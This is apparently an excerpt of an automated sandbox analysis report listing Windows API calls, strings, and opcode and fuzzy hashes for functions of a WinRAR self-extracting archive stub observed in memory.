                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00C7E0C9
                                                                                              • Sleep.KERNEL32(?), ref: 00C7E0F7
                                                                                              • DeleteObject.GDI32 ref: 00C7E130
                                                                                              • DeleteObject.GDI32(?), ref: 00C7E140
                                                                                              • CloseHandle.KERNEL32 ref: 00C7E183
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3049964643-433059772

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6D5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6EC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A703
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A712
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00C7B73D,00000066), ref: 00C7A72D
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00C7A73E
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00C7A762
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00C7A7C6
                                                                                                • Part of subcall function 00C7A626: GdipAlloc.GDIPLUS(00000010), ref: 00C7A62C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C7A7A7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00C7A7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 211097158-364855578
                                                                                              • Opcode ID: 4c480b63c3fbc013e44cd455193efe4932a27d2e214e13b846bbee76eaf6a5fa
                                                                                              • Instruction ID: de377fa7529e38a5a7d18413790a3c35afe18b5b20bd184b6998947ec92ce97b
                                                                                              • Opcode Fuzzy Hash: 4c480b63c3fbc013e44cd455193efe4932a27d2e214e13b846bbee76eaf6a5fa
                                                                                              • Instruction Fuzzy Hash: A2319E75600342BFC7149F21EC8DF2F7BB8EF84750B04851AF91982620EB31DD449AA2

                                                                                              Control-flow Graph (function starting at c6a69b; graph image not reproduced, nodes marked Executed / Not Executed)
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6C4
                                                                                                • Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6F2
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6FE
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A728
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A734
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: d11b3b73514be654e6c45e8acb80266631693e5837e3e36045cc788253fff3a2
                                                                                              • Instruction ID: 8dc71403fbfe9721b366b309b80ccbb0a9c9e536af3ba3b6b109c9c5bd9007b0
                                                                                              • Opcode Fuzzy Hash: d11b3b73514be654e6c45e8acb80266631693e5837e3e36045cc788253fff3a2
                                                                                              • Instruction Fuzzy Hash: E4415B72900555ABCB25DF68CCC8BEAB7B8FB48350F144296E96DE3240D734AE94DF90
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00C87DC4,00000000,00C9C300,0000000C,00C87F1B,00000000,00000002,00000000), ref: 00C87E0F
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00C87DC4,00000000,00C9C300,0000000C,00C87F1B,00000000,00000002,00000000), ref: 00C87E16
                                                                                              • ExitProcess.KERNEL32 ref: 00C87E28
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: e0ec2470514da5bc901d64663d3243f7ac90f84eec74d81c17b9939ebe49a333
                                                                                              • Instruction ID: 54d7062191c5b88ce0d9234d79ac783ae75b93b2f4709b713d3771ae9e5c736e
                                                                                              • Opcode Fuzzy Hash: e0ec2470514da5bc901d64663d3243f7ac90f84eec74d81c17b9939ebe49a333
                                                                                              • Instruction Fuzzy Hash: 84E0B631004188EFCF117F64DD0EB4E7F6AEB51386B104555F8198A132DB3ADE52DB98
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 61a67050fb97fc868a2981603a1dfe4ca2d07b28268b8d09cf22ef0c13f2483e
                                                                                              • Instruction ID: 0ac7d98797c82b4c4db88908d3eb1681dd5ecf6a347ad7e4286cc616fe907aac
                                                                                              • Opcode Fuzzy Hash: 61a67050fb97fc868a2981603a1dfe4ca2d07b28268b8d09cf22ef0c13f2483e
                                                                                              • Instruction Fuzzy Hash: 6A821A70904245AEDF35DF64C8D5BFABBB9AF05300F0842B9E9599B182CB315B8CDB61
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C7B7E5
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7B8D1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B8EF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00C7B902
                                                                                              • TranslateMessage.USER32(?), ref: 00C7B910
                                                                                              • DispatchMessageW.USER32(?), ref: 00C7B91A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00C7B93D
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7B960
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00C7B983
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7B99E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7B9B1
                                                                                                • Part of subcall function 00C7D453: _wcslen.LIBCMT ref: 00C7D47D
                                                                                              • SetFocus.USER32(00000000), ref: 00C7B9B8
                                                                                              • _swprintf.LIBCMT ref: 00C7BA24
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                                • Part of subcall function 00C7D4D4: GetDlgItem.USER32(00000068,00CBFCB8), ref: 00C7D4E8
                                                                                                • Part of subcall function 00C7D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00C7AF07,00000001,?,?,00C7B7B9,00C9506C,00CBFCB8,00CBFCB8,00001000,00000000,00000000), ref: 00C7D510
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7D51B
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7D529
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D53F
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C7D559
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D59D
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C7D5AB
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D5BA
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D5E1
                                                                                                • Part of subcall function 00C7D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00C943F4), ref: 00C7D5F0
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00C7BA68
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00C7BA90
                                                                                              • GetTickCount.KERNEL32 ref: 00C7BAAE
                                                                                              • _swprintf.LIBCMT ref: 00C7BAC2
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00C7BAF4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00C7BB43
                                                                                              • _swprintf.LIBCMT ref: 00C7BB7C
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00C7BBD0
                                                                                              • GetCommandLineW.KERNEL32 ref: 00C7BBEA
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00C7BC47
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00C7BC6F
                                                                                              • Sleep.KERNEL32(00000064), ref: 00C7BCB9
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00C7BCE2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C7BCEB
                                                                                              • _swprintf.LIBCMT ref: 00C7BD1E
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7BD7D
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00C935F4), ref: 00C7BD94
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00C7BD9D
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00C7BDAC
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C7BDBB
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7BE68
                                                                                              • _wcslen.LIBCMT ref: 00C7BEBE
                                                                                              • _swprintf.LIBCMT ref: 00C7BEE8
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00C7BF32
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00C7BF4C
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00C7BF55
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00C7BF6B
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00C7BF85
                                                                                              • SetWindowTextW.USER32(00000000,00CAA472), ref: 00C7BFA7
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00C7C007
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7C01A
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00C7C0BD
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00C7C197
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00C7C1D9
                                                                                                • Part of subcall function 00C7C73F: __EH_prolog.LIBCMT ref: 00C7C744
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00C7C1FD
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 581453772-2608530638
                                                                                              • Opcode ID: 494211987701d7557f72b827f2be5cb0d1aba03c24d37ab52ded69e93374b5fb
                                                                                              • Instruction ID: 23e4cf337df9b89b8d5fdd05ad6d542d316cb5a6bfa382728fcb5d8832befaf3
                                                                                              • Opcode Fuzzy Hash: 494211987701d7557f72b827f2be5cb0d1aba03c24d37ab52ded69e93374b5fb
                                                                                              • Instruction Fuzzy Hash: 51422871944249BFEB21AB70DC8AFBE3B7CAB06704F048059F659A61D2CB749F44DB21

                                                                                              Control-flow Graph (function starting at c70863; graph image not reproduced, nodes marked Executed / Not Executed)
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00C7087C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C7088E
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C708BF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C70B69
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C70B83
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C70B93
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00C93C7C,00000000), ref: 00C70BB1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C70C09
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C70C1E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00C93C7C,?,00000000,?,00000800), ref: 00C70C72
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00C93C7C,00000800,?,00000000,?,00000800), ref: 00C70C9C
                                                                                              • GetFileAttributesW.KERNEL32(?,?,00C93D44,00000800), ref: 00C70CD8
                                                                                                • Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
                                                                                                • Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858
                                                                                              • _swprintf.LIBCMT ref: 00C70D4A
                                                                                              • _swprintf.LIBCMT ref: 00C70D96
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • AllocConsole.KERNEL32 ref: 00C70D9E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00C70DA8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00C70DAF
                                                                                              • _wcslen.LIBCMT ref: 00C70DC4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00C70DD5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00C70DDC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00C70DE7
                                                                                              • FreeConsole.KERNEL32 ref: 00C70DED
                                                                                              • ExitProcess.KERNEL32 ref: 00C70DF5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 1207345701-3298887752
                                                                                              • Opcode ID: 89b4dafa43a1090e7dae79bc24e6d69a20dad28c5dc16040f99b3520c7bfc3e4
                                                                                              • Instruction ID: 0b907d0391d9a67eb5cc09a5f1f1fc91d5dc5724a418fb2165caa00d6fe7981b
                                                                                              • Opcode Fuzzy Hash: 89b4dafa43a1090e7dae79bc24e6d69a20dad28c5dc16040f99b3520c7bfc3e4
                                                                                              • Instruction Fuzzy Hash: 3DD13FF10083C4ABDF359F50C88DB9FBBE8BB85704F50491DF59996250DBB09A49CB62

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C7C744
                                                                                                • Part of subcall function 00C7B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00C7B3FB
                                                                                              • _wcslen.LIBCMT ref: 00C7CA0A
                                                                                              • _wcslen.LIBCMT ref: 00C7CA13
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00C7CA71
                                                                                              • _wcslen.LIBCMT ref: 00C7CAB3
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00C7CBFB
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00C7CC36
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00C7CC46
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00CAA472), ref: 00C7CC54
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C7CC7F
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 2804936435-312220925
                                                                                              • Opcode ID: 1aad36cc68da419ab1aa3730ddb3519a5b1f3aa27f83c30579c39a56df338f4a
                                                                                              • Instruction ID: 424a4525d5ddc83f014d7955bf6c2af0a70486c48909cea79a8f3452fdd104d1
                                                                                              • Opcode Fuzzy Hash: 1aad36cc68da419ab1aa3730ddb3519a5b1f3aa27f83c30579c39a56df338f4a
                                                                                              • Instruction Fuzzy Hash: 09E156B2900159AADF25DBA0DC85EEE73BCAF04350F1481AAF619E7050EB749F849F64
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C6DA70
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C6DAAC
                                                                                                • Part of subcall function 00C6C29A: _wcslen.LIBCMT ref: 00C6C2A2
                                                                                                • Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0
                                                                                                • Part of subcall function 00C71B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C6BAE9,00000000,?,?,?,00010414), ref: 00C71BA0
                                                                                              • _wcslen.LIBCMT ref: 00C6DDE9
                                                                                              • __fprintf_l.LIBCMT ref: 00C6DF1C
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 566448164-801612888
                                                                                              • Opcode ID: 5514f9adaf081cca973f276ac0e1fdc26c565a318770af77b647bc132d454f9a
                                                                                              • Instruction ID: 3c62a0b2e41153fd6de1ac290ba0b68692df00f11c231fb2f4084881bae186ec
                                                                                              • Opcode Fuzzy Hash: 5514f9adaf081cca973f276ac0e1fdc26c565a318770af77b647bc132d454f9a
                                                                                              • Instruction Fuzzy Hash: C332F175A00218EBCF34EF68C885BEE77A5FF05704F40016AF9169B281EBB19E85DB54

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
                                                                                                • Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
                                                                                                • Part of subcall function 00C7B568: IsDialogMessageW.USER32(00010414,?), ref: 00C7B59E
                                                                                                • Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
                                                                                                • Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6
                                                                                              • GetDlgItem.USER32(00000068,00CBFCB8), ref: 00C7D4E8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00C7AF07,00000001,?,?,00C7B7B9,00C9506C,00CBFCB8,00CBFCB8,00001000,00000000,00000000), ref: 00C7D510
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C7D51B
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00C935F4), ref: 00C7D529
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D53F
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C7D559
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D59D
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C7D5AB
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C7D5BA
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C7D5E1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00C943F4), ref: 00C7D5F0
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: eb3c96aecd10339099c203fa12455cbdb811eccbf563173ba753e7a9fb2d36f4
                                                                                              • Instruction ID: 70e4ac23f4480e7ad503e506b89e44e629ec61fe448c643190e59bf30ea80e77
                                                                                              • Opcode Fuzzy Hash: eb3c96aecd10339099c203fa12455cbdb811eccbf563173ba753e7a9fb2d36f4
                                                                                              • Instruction Fuzzy Hash: 4831B372145382AFE301EF20EC4AFAF7FACEB8A748F008518F55196191DB659A088776

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00C7D7AE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00C7D8DE
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00C7D91D
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00C7D959
                                                                                              • CloseHandle.KERNEL32(?), ref: 00C7D97F
                                                                                              • ShowWindow.USER32(?,00000001), ref: 00C7D9E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                              • String ID: .exe$.inf
                                                                                              • API String ID: 36480843-3750412487
                                                                                              • Opcode ID: 387584cb4a412d33b707a7afe5e5e3f0eeac304304000bf00fad0e010e46051b
                                                                                              • Instruction ID: 0ff833aa8bb5abed1df4cbd998241cd06cdc7729dd5b6347f25fba1a0bed0e42
                                                                                              • Opcode Fuzzy Hash: 387584cb4a412d33b707a7afe5e5e3f0eeac304304000bf00fad0e010e46051b
                                                                                              • Instruction Fuzzy Hash: DF51E4710043809ADB319F24E845BAFBBF4AF85744F04841EFADA971A1DB71CB85DB52

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C85695,00C85695,?,?,?,00C8ABAC,00000001,00000001,2DE85006), ref: 00C8A9B5
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C8ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00C8AA3B
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C8AB35
                                                                                              • __freea.LIBCMT ref: 00C8AB42
                                                                                                • Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              • __freea.LIBCMT ref: 00C8AB4B
                                                                                              • __freea.LIBCMT ref: 00C8AB70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 911178b7cf344b0319713faa20e60fcb4076b6471726afc04d40bf0bd6cabeb5
                                                                                              • Instruction ID: 0dcfcbe7e7f2ba7e84a6daa023290f7ebbd36ea9c17406419e66bc3c48d803a9
                                                                                              • Opcode Fuzzy Hash: 911178b7cf344b0319713faa20e60fcb4076b6471726afc04d40bf0bd6cabeb5
                                                                                              • Instruction Fuzzy Hash: F951F272600216AFFB25AE64CC41FBFB7AAEB40718F15462AFC14D6150EB30DD40D79A

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 975 c83b72-c83b7c 976 c83bee-c83bf1 975->976 977 c83b7e-c83b8c 976->977 978 c83bf3 976->978 980 c83b8e-c83b91 977->980 981 c83b95-c83bb1 LoadLibraryExW 977->981 979 c83bf5-c83bf9 978->979 982 c83c09-c83c0b 980->982 983 c83b93 980->983 984 c83bfa-c83c00 981->984 985 c83bb3-c83bbc GetLastError 981->985 982->979 987 c83beb 983->987 984->982 986 c83c02-c83c03 FreeLibrary 984->986 988 c83bbe-c83bd3 call c86088 985->988 989 c83be6-c83be9 985->989 986->982 987->976 988->989 992 c83bd5-c83be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00C83C35,?,?,00CC2088,00000000,?,00C83D60,00000004,InitializeCriticalSectionEx,00C96394,InitializeCriticalSectionEx,00000000), ref: 00C83C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3664257935-2084034818
                                                                                              • Opcode ID: fe7e96b0c1888c2f3ce35c09b47063fabb09b27452b80fadb2e5d59c61b672fe
                                                                                              • Instruction ID: 2f062c96b2992ca2c09c2b3f6c1cb5f274bbf41b5e98b283b71d0212b6c4250c
                                                                                              • Opcode Fuzzy Hash: fe7e96b0c1888c2f3ce35c09b47063fabb09b27452b80fadb2e5d59c61b672fe
                                                                                              • Instruction Fuzzy Hash: 4F112971A056A1ABCF22AB689C45B6D37649F01F78F211221F821FB2D0E734EF0087D8

